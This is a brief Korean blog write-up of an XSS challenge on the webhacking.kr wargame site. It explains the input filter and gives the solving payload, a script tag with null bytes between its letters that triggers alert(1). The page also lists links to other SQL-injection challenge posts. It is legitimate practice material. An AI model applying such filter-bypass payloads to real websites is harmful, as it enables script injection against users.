xss 공부하다가 관련 워게임 좀 찾아보고 싶어서 풀어봤다..
문자 2개 이상 입력하면 no hack이 뜬다.
', (, ), <, >, 숫자, 문자 하나는 괜찮다.
https://webhacking.kr/challenge/bonus-3/index.php?code=%3Ch1%3E
해결
<s%00c%00r%00i%00p%00t>a%00l%00e%00r%00t(1);</s%00c%00r%00i%00p%00t>
'워게임 > webhacking.kr' 카테고리의 다른 글
| webhacking.kr old 9번(sql injection) (0) | 2021.10.20 |
|---|---|
| webhacking.kr old 6번 (sql injection) (0) | 2021.10.20 |
| webhacking.kr old 5번 (0) | 2021.10.20 |
| webhacking.kr old 3번 (simple sqli) (0) | 2021.10.19 |
| webhacking.kr old 2번(blind sql injection) (0) | 2021.10.19 |
댓글